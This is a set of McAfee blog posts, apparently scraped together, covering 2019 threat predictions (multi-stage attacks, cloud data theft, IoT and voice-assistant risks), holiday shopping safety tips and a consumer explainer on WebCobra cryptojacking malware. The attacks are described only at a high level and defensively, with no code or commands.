This year we have seen cyber threats adapt and pivot faster than ever. We have seen ransomware evolving to be more effective or operate as a smoke screen. We have seen cryptojacking soar, as it provides a better, and safer, return on investment than ransomware. We can still see phishing going strong and finding new vulnerabilities to exploit. We also noticed fileless and “living off the land” threats are more slippery and evasive than ever, and we have even seen the incubation of steganography malware in the Pyeongchang Olympics campaign. In 2019, we predict attackers will more frequently combine these tactics to create multifaced, or synergistic, threats.

What could be worse?

Attacks are usually centered on the use of one threat. Bad actors concentrate their efforts on iterating and evolving one threat at a time for effectiveness and evasion. When an attack is successful, it is classified as ransomware, cryptojacking, data exfiltration, etc., and defenses are put in place. At this point, the attack’s success rate is significantly reduced. However, if a sophisticated attack involves not one but five top-notch threats synergistically working together, the defense panorama could become very blurry. The challenge arises when an attempt is made to identify and mitigate the attack. Because the ultimate attack goals are unknown, one might get lost in the details of each threat as it plays a role in the chain.

One of the reasons synergic threats are becoming a reality is because bad actors are improving their skills by developing foundations, kits, and reusable threat components. As attackers organize their efforts into a black-market business model, they can focus on adding value to previous building blocks. This strategy allows them to orchestrate multiple threats instead of just one to reach their goals.

An example is worth a thousand words

Imagine an attack that starts with a phishing threat—not a typical campaign using Word documents, but a novel technique. This phishing email contains a video attachment. When you open the video, your video player does not play and prompts you to update the codec. Once you run the update, a steganographic polyglot file (a simple GIF) is deployed on your system. Because it is a polyglot (a file that conforms to more than one format at the same time), the GIF file schedules a task that fetches a fileless script hosted on a compromised system. That script running in memory evaluates your system and decides to run either ransomware or a cryptocurrency miner. That is a dangerous synergistic threat in action.

The attack raises many questions: What are you dealing with? Is it phishing 2.0? Is it stegware? Is it fileless and “living off the land”? Cryptojacking? Ransomware? It is everything at the same time.

This sophisticated but feasible example demonstrates that focusing on one threat may not be enough to detect or remediate an attack. When you aim to classify the attack into a single category, you might lose the big picture and thus be less effective mitigating it. Even if you stop the attack in the middle of the chain, discovering the initial and final stages is as important for protecting against future attempts.

Be curious, be creative, connect your defenses

Tackling sophisticated attacks based on synergic threats requires questioning every threat. What if this ransomware hit was part of something bigger? What if this phishing email pivots to a technique that employees are not trained for? What if we are missing the real goal of the attack?

Bearing these questions in mind will not only help capture the big picture, but also get the most of security solutions. We predict bad actors will add synergy to their attacks, but cyber defenses can also work synergistically.

Cybercriminals to Use Social Media Misinformation, Extortion Campaigns to Challenge Organizations’ Brands

The elections were influenced, fake news prevails, and our social media followers are all foreign government–controlled bots. At least that’s how the world feels sometimes. To say recent years have been troubled for social media companies would be an understatement. During this period a game of cat and mouse has ensued, as automated accounts are taken down, adversaries tactics evolve, and botnet accounts emerge looking more legitimate than ever before. In 2019, we predict an increase of misinformation and extortion campaigns via social media that will focus on brands and originate not from nation-state actors but from criminal groups.

Nation-states leverage bot battalions to deliver messages or manipulate opinion, and their effectiveness is striking. Bots often will take both sides of a story to spur debate, and this tactic works. By employing a system of amplifying nodes, as well as testing the messaging (including hashtags) to determine success rates, botnet operators demonstrate a real understanding of how to mold popular opinion on critical issues.

In one example, an account that was only two weeks old with 279 followers, most of which were other bots, began a harassment campaign against an organization. By amplification, the account generated an additional 1,500 followers in only four weeks by simply tweeting malicious content about their target.

Activities to manipulate public opinion have been well documented and bots well versed in manipulating conversations to drive agendas stand ready. Next year we expect that cybercriminals will repurpose these campaigns to extort companies by threatening to damage their brands. Organizations face a serious danger.

Data Exfiltration Attacks to Target the Cloud

In the past two years, enterprises have widely adopted the Software-as-a-Service model, such as Office 365, as well as Infrastructure- and Platform-as-a-Service cloud models, such as AWS and Azure. With this move, far more corporate data now resides in the cloud. In 2019, we expect a significant increase in attacks that follow the data to the cloud.

With the increased adoption of Office 365, we have noticed a surge of attacks on the service— especially attempts to compromise email. One threat the McAfee cloud team uncovered was the botnet KnockKnock, which targeted system accounts that typically do not have multifactor authentication. We have also seen the emergence of exploits of the trust model in the Open Authorization standard. One was launched by Fancy Bear, the Russian cyber espionage group, phishing users with a fake Google security app to gain access to user data.

Similarly, during the last couple of years we have seen many high-profile data breaches attributed to misconfigured Amazon S3 buckets. This is clearly not the fault of AWS. Based on the shared responsibility model, the customer is on the hook to properly configure IaaS/PaaS infrastructure and properly protect their enterprise data and user access. Complicating matters, many of these misconfigured buckets are owned by vendors in their supply chains, rather than by the target enterprises. With access to thousands of open buckets and credentials, bad actors are increasingly opting for these easy pickings.

McAfee has found that 21% of data in the cloud is sensitive—such as intellectual property, and customer and personal data—according to the McAfee Cloud Adoption and Risk Report. With a 33% increase in users collaborating on this data during the past year, cybercriminals know how to seek more targets:

  • Cloud-native attacks targeting weak APIs or ungoverned API endpoints to gain access to the data in SaaS as well as in PaaS and serverless workloads
  • Expanded reconnaissance and exfiltration of data in cloud databases (PaaS or custom applications deployed in IaaS) expanding the S3 exfiltration vector to structured data in databases or data lakes
  • Leveraging the cloud as a springboard for cloud-native man-in-the-middle attacks (such as GhostWriter, which exploits publicly writable S3 buckets introduced due to customer misconfigurations) to launch cryptojacking or ransomware attacks into other variants of MITM attacks.

Voice-Controlled Digital Assistants the Next Vector in Attacking IoT Devices

As tech fans continue to fill their homes with smart gadgets, from plugs to TVs, coffee makers to refrigerators, and motion sensors to lighting, the means of gaining entry to a home network are growing rapidly, especially given how poorly secured many IoT devices remain.

But the real key to the network door next year will be the voice-controlled digital assistant, a device created in part to manage all the IoT devices within a home. As sales increase—and an explosion in adoption over the holiday season looks likely—the attraction for cybercriminals to use assistants to jump to the really interesting devices on a network will only continue to grow.

For now, the voice assistant market is still taking shape, with many brands still looking to dominate the market, in more ways than one, and it is unclear whether one device will become ubiquitous. If one does take the lead, its security features will quite rightly fall under the microscope of the media, though not perhaps before its privacy concerns have been fully examined in prose.

(Last year we highlighted privacy as the key concern for home IoT devices. Privacy will continue to be a concern, but cybercriminals will put more effort into building botnets, demanding ransoms, and threatening the destruction of property of both homes and businesses).

This opportunity to control a home’s or office’s devices will not go unnoticed by cybercriminals, who will engage in an altogether different type of writing in relation to the market winner, in the form of malicious code designed to attack not only IoT devices but also the digital assistants that are given so much license to talk to them.

Smartphones have already served as the door to a threat. In 2019, they may well become the picklock that opens a much larger door. We have already seen two threats that demonstrate what cybercriminals can do with unprotected devices, in the form of the Mirai botnet, which first struck in 2016, and IoT Reaper, in 2017. These IoT malware appeared in many variants to attack connected devices such as routers, network video recorders, and IP cameras. They expanded their reach by password cracking and exploiting known vulnerabilities to build worldwide robot networks.

Next year we expect to see two main vectors for attacking home IoT devices: routers and smartphones/ tablets. The Mirai botnet demonstrated the lack of security in routers. Infected smartphones, which can already monitor and control home devices, will become one of the top targets of cybercriminals, who will employ current and new techniques to take control.

Malware authors will take advantage of phones and tablets, those already trusted controllers, to try to take over IoT devices by password cracking and exploiting vulnerabilities. These attacks will not appear suspicious because the network traffic comes from a trusted device. The success rate of attacks will increase, and the attack routes will be difficult to identify. An infected smartphone could cause the next example of hijacking the DNS settings on a router. Vulnerabilities in mobile and cloud apps are also ripe for exploitation, with smartphones at the core of the criminals’ strategy.

Infected IoT devices will supply botnets, which can launch DDoS attacks, as well as steal personal data. The more sophisticated IoT malware will exploit voice-controlled digital assistants to hide its suspicious activities from users and home-network security software. Malicious activities such as opening doors and connecting to control servers could be triggered by user voice commands (“Play music” and “What is today’s weather?”). Soon we may hear infected IoT devices themselves exclaiming: “Assistant! Open the back door!”

Cybercriminals to Increase Attacks on Identity Platforms and Edge Devices Under Siege

Large-scale data breaches of identity platforms—which offer centralized secure authentication and authorization of users, devices, and services across IT environments—have been well documented in 2018. Meanwhile, the captured data is being reused to cause further misery for its victims. In 2019, we expect to see large-scale social media platforms implement additional measures to protect customer information. However, as the platforms grow in numbers, we predict criminals will further focus their resources on such attractive, data-rich environments. The struggle between criminals and big-scale platforms will be the next big battleground.

Triton, malware that attacks industrial control systems (ICS), has demonstrated the capabilities of adversaries to remotely target manufacturing environments through their adjacent IT environments. Identity platform and “edge device” breaches will provide the keys to adversaries to launch future remote ICS attacks due to static password use across environments and constrained edge devices, which lack secure system requirements due to design limitations. (An edge device is any network-enabled system hardware or protocol within an IoT product.) We expect multifactor authentication and identity intelligence will become the best methods to provide security in this escalating battle. We also predict identity intelligence will complement multifactor authentication to strengthen the capabilities of identity platforms.

Identity is a fundamental component in securing IoT. In these ecosystems, devices and services must securely identify trusted devices so that they can ignore the rest. The identity model has shifted from user centric in traditional IT systems to machine centric for IoT systems. Unfortunately, due to the integration of operational technology and insecure “edge device” design, the IoT trust model is built on a weak foundation of assumed trust and perimeter-based security.

At Black Hat USA and DEF CON 2018, 30 talks discussed IoT edge device exploitation. That’s a large increase from just 19 talks on the topic in 2017. The increase in interest was primarily in relation to ICS, consumer, medical, and “smart city” verticals. (See Figure 1.) Smart edge devices, combined with high-speed connectivity, are enabling IoT ecosystems, but the rate at which they are advancing is compromising the security of these systems.

Figure 1: The number of conference sessions on the security of IoT devices has increased, matching the growing threat to poorly protected devices. 

Most IoT edge devices provide no self-defense (isolating critical functions, memory protection, firmware protection, least privileges, or security by default) so one successful exploit owns the device. IoT edge devices also suffer from “break once, run everywhere” attacks—due to insecure components used across many device types and verticals. (See articles on WingOS and reverse engineering.)

McAfee Advanced Threat Research team engineers have demonstrated how medical device protocols can be exploited to endanger human life and compromise patients’ privacy due to assumed trust. These examples illustrate just a few of many possible scenarios that lead us to believe adversaries will choose IoT edge devices as the path of least resistance to achieve their objectives. Servers have been hardened over the last decade, but IoT hardware is far behind. By understanding an adversary’s motives and opportunities (attack surface and access capability), we can define a set of security requirements independent of a specific attack vector.

Figure 2 gives a breakdown of the types of vulnerabilities in IoT edge devices, highlighting weak points to address by building identity and integrity capabilities into edge hardware to ensure these devices can deflect attacks.

Figure 2: Insecure protocols are the primary attack surface in IoT edge devices.

IoT security must begin on the edge with a zero-trust model and provide a hardware root of trust as the core building block for protecting against hack and shack attacks and other threats. McAfee predicts an increase in compromises on identity platforms and IoT edge devices in 2019 due to the adoption of smart cities and increased ICS activity.

The post McAfee Labs 2019 Threats Predictions Report appeared first on McAfee Blogs.

8 Ways to Secure Your Family’s Online Holiday Shopping

It’s officially the most wonderful time of the year — no doubt about it. But each year, as our reliance and agility on our mobile devices increases, so too might our impulsivity and even inattention when it comes to digital transactions.

Before getting caught up in the whirlwind of gift giving and the thrill of the perfect purchase, consider taking a small pause. Stop to consider that as giddy as you may be to find that perfect gift, hackers are just as giddy this time of year to catch shoppers unaware and snatch what they can from the deep, digital holiday coffers. In fact, according to the FBI’s Internet Crime Complaint Center, the number one cybercrime of 2017 was related to online shopping; specifically, payment for or non-delivery of goods purchased.

8 Ways to Secure Your Family’s Holiday Shopping Online

  1. Make it a family discussion. Make no assumptions when it comes to what your kids do and do not understand (and practice) when it comes to shopping safely online. Go over the points below as a family. Because kids are nearly 100% mobile, online shopping and transactions can move swiftly, and the chances of making a mistake or falling prey to a scam can increase. Caution kids to slow down and examine every website and link in the buying journey.
  2. Beware of malicious links. The most common forms of fraud and cyber attacks are phishing scams and socially-engineered malware. Check links before you click them and consider using McAfee® WebAdvisor, a free download that safeguards you from malware and phishing attempts while you surf — without impacting your browsing performance.
  3. Don’t shop on unsecured wi-fi. Most public networks don’t encrypt transmitted data, which makes all your online activity on public wi-fi vulnerable to hackers. Resist shopping on an unsecured wireless network (at a coffee shop, library, airport). Instead, do all of your online shopping from your secure home computer. If you have to conduct transactions on a public Wi-Fi connection use a virtual private network (VPN) such as McAfee® SafeConnect to maintain a secure connection in public places. To be sure your home network is safe, secure your router.
  4. Is that site legit? Before purchasing a product online, check the URL carefully. If the address bar says “HTTP” instead of “HTTPS” in its URL, do not purchase from the site. As of July 2018, unsecured sites now include a “Not Secure” warning, which is very helpful to shoppers. Also, an icon of a locked padlock will appear to the left of the URL in the address bar or the status bar down below depending on your browser. Cybercriminals can make a fake site look very close to the real thing. One added step: Google the site if anything feels wrong about it, and you may find some unlucky consumers sharing their stories.
  5. Review bills closely. Review your credit card statements in January and February, when your holiday purchases will show up. Credit cards offer better fraud protection than debit. So, if you’re shopping online during the holidays, give yourself an extra layer of protection from scams by using a credit card. Think about using the same card between family members to make checking your bill easier.
  6. Create new, strong passwords. If you are getting ready to do a lot of shopping online, it’s a great time to update your passwords. Choose a password that is unhackable rather than one that is super easy to remember.
  7. Verify charities. One of the best things about the holidays is the spirit of giving. Hackers and crooks know this and are working hard to trick innocent givers. This reality means that some seasonal charities may be well-devised scams. Before you donate, be sure to do a little research. Look at the website’s URL; it’s design, its security badges. Google the charity and see if any scams have been reported.
  8. Protect your data from third parties. Sites may contain “third parties,” which are other embedded websites your browser talks to such as advertisers, website analytics engines, that can watch your browsing behavior. To protect your data when shopping and get rid of third-party access, you need to wipe your cookies (data trackers) clean using your settings, then change your browser settings (choose “block third-party cookies and site data”) to make sure the cookies can’t track your buying behavior. You can also go into your settings and direct your browser to shop in private or incognito mode.

No one is immune to holiday scams. Many scams are intricately designed and executed so that even the savviest consumer is duped. You can enjoy the shopping that comes with the holidays by keeping these few safety precautions in mind. Don’t let your emotional desire for that perfect gift override your reasoning skills. Listen to your intuition when it comes to suspicious websites, offers, emails, pop-up ads, and apps. Pause. Analyze. And make sure you are purchasing from a legitimate site.

Stay safe and WIN: Now that you’ve read about safe shopping basics, head over to our Protect What Matters site. If you successfully complete the Holiday Online Shopping Adventure quiz, you can enter your email address for the chance to win a tech prize pack with some of this season’s hottest smart gadgets. Have fun, and stay safe online this holiday season!

 

The post 8 Ways to Secure Your Family’s Online Holiday Shopping appeared first on McAfee Blogs.

Holiday Stress Can Make You More Careless Online

Holiday stress. Every year, come November, my resting heart rate starts to rise: the festive season is approaching. Not only is there so much to do but there’s so much to spend money on. There are presents to purchase, feasts to prepare and party outfits to buy. Throw in a holiday to fill the long Summer break, and both the credit cards and my stress levels are starting to rapidly increase!

Holiday Financial Stress Results in Poor Decision Making Online

But did you know that this stress can affect our online safety? Research conducted by McAfee shows that almost 80% of us believe the holiday period causes financial stress. And nearly half of us (46%) believe the stress of the holiday season can cause us to behave carelessly online.  Risky behaviours can put our online safety at risk. For instance, using public Wi-Fi to snag a last-minute purchase. Or buying something from an unfamiliar website because it’s cheaper.

Aussie Shoppers Love an Online Bargain 

In 2017, Aussies spent a record $21.3 million online – a whopping 19% increase over 2016. McAfee’s research shows that Aussie consumers love securing a bargain online – who doesn’t!! But many will seek out a great deal even if it means potentially jeopardising their online safety. The research shows that 64% of consumers are willing to use an unfamiliar website if it means they can save money on their purchase. Even more concerning, a third of Aussies admitted to clicking links in suspicious emails for better deals!! Yikes!!

The Thing Is, Cyber Criminals Love Your Holiday Shopping Too

Cyber criminals work very hard to take advantage of us during the busy Holiday season. They come up with all sorts of ingenious ways to target time-poor and budget-conscious consumers online. They know very well that many of us will cut corners with our online security. Particularly if we think we can save money on presents, outfits or even a holiday.

And they scheme accordingly: charity phishing emails, fake online stores, bogus delivery emails, e-voucher scams and more. Cyber criminals have tried and tested strategies to either steal our personal information or our identity.

How You Can Stay Safe While Shopping Online This Holiday Season

So, don’t feel like you need to battle the crowds at Westfield this festive season. You can still shop online safely if you follow a few simple steps:

  1. Connect with Caution

Public Wi-Fi is just so convenient, but it is a risky business. Users could unknowingly share their personal information with cyber criminals who are snooping on the network. So, if you absolutely have to use public Wi-Fi for a great online shopping deal, always use a Virtual Private Network (VPN) such as McAfee Safe Connect which creates a bank-grade encrypted connection.

  1. Think Before You Click

One of the easiest ways for a cyber criminal to target victims is using phishing emails to trick consumers into sharing their personal information. Phishing emails could be disguised as holiday savings or even a shopping notification. Instead of clicking on a link in an email, always check directly with the source to verify an offer or shipment.

  1. Always Shop with Security Protection

Shopping online without security protection is like driving without a seat belt – dangerous! Comprehensive antivirus software like McAfee Total Protection will help shield your devices against malware, phishing attacks and other threats. It also provides a firewall, an anti-spam function, parental controls and a password management tool. A complete no-brainer!

But this year, I’m going to commit to lowering my stress. That way I can really enjoy my time with my family and friends. To get ahead of the game I plan to:

  • Start my online shopping earlier so I don’t ‘cut corners’ with my online safety,
  • Create a realistic budget, and
  • Start filling my freezer with some holiday food – now

And most importantly, get that resting heart rate under control!!

Happy Holidays Everyone!

Alex xx

The post Holiday Stress Can Make You More Careless Online appeared first on McAfee Blogs.

Preventing WebCobra Malware From Slithering Onto Your System

Cryptocurrency mining is the way transactions are verified and added to the public ledger, a database of all the transactions made around a particular piece of cryptocurrency. Cryptocurrency miners compile all of these transactions into blocks and try to solve complicated mathematical problems to compete with other miners for bitcoins. To do this, miners need a ton of computer resources, since successful bitcoin mining requires a large amount of hardware. Unfortunately, these miners can be used for more nefarious purposes if they’re included within malicious software. Enter WebCobra, a malware that exploits victims’ computers to help cybercriminals mine for cryptocurrencies, a method also known as cryptojacking.

How does WebCobra malware work, exactly? First, WebCobra uses droppers (Trojans designed to install malware onto a victim’s device) to check the computer’s system. The droppers let the malware know which cryptocurrency miner to launch. Then, it silently slithers onto a victim’s device via rogue PUP (potentially unwanted program) and installs one of two miners: Cryptonight or Claymore’s Zcash. Depending on the miner, it will drain the victim’s device of its computer processor’s resources or install malicious file folders that are difficult to find.

The most threatening part of WebCobra malware is that it can be very difficult to detect. Often times, the only sign of its presence is decreased computer performance. Plus, when the dropper is scanning the victim’s device, it will also check for security products running on the system. Many security products use APIs, or application programming interfaces, to monitor malware behavior – and WebCobra is able to overwrite some. This means it can essentially unhook the API and disrupt the system’s communication methods, and therefore remain undetected for a long time.

While cryptocurrency mining can be a harmless hobby, users should be cautious of criminal miners with poor intentions. So, what can you do to prevent WebCobra from slithering onto your system? Check out the following tips:

  • If your computer slows down, be cautious. It can be hard to determine if your device is being used for a cryptojacking campaign. One way you can identify the attack – poor performance. If your device is slow or acting strange, start investigating and see if your device may be infected with malware.
  • Use a comprehensive security solution. Having your device infected with malware will not only slow down its performance but could potentially lead to exposed data. To secure your device and help keep your system running smoothly and safely, use a program like McAfee Total Protection. McAfee products are confirmed to detect WebCobra.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Preventing WebCobra Malware From Slithering Onto Your System appeared first on McAfee Blogs.